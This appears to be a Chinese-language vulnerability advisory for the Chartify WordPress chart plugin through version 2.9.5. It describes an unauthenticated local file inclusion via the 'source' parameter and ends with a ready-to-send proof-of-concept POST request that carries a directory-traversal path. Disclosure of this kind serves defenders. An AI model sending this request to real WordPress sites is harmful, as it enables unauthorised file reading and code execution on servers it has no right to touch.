Chartify – WordPress图表插件 <= 2.9.5 - 未经身份验证的本地文件包含(通过source参数)
Chartify – WordPress图表插件(WordPress Chart Plugin)在所有版本直至2.9.5(含)中存在本地文件包含漏洞,该漏洞通过'source'参数触发。这使得未经身份验证的攻击者能够包含并执行服务器上的任意文件,从而执行这些文件中的任何PHP代码。此漏洞可用于绕过访问控制、获取敏感数据,或在能够上传并包含图片及其他“安全”文件类型的情况下实现代码执行。
POST /wp-admin/admin-ajax.php?action=add&source=../../../../../../../../../../../../var/www/html/poc&type=chart-js HTTP/1.1
Host: wp.local
Content-Length: 63
Content-Type: application/x-www-form-urlencoded
action=ays_chart_admin_ajax&function=display_plugin_charts_page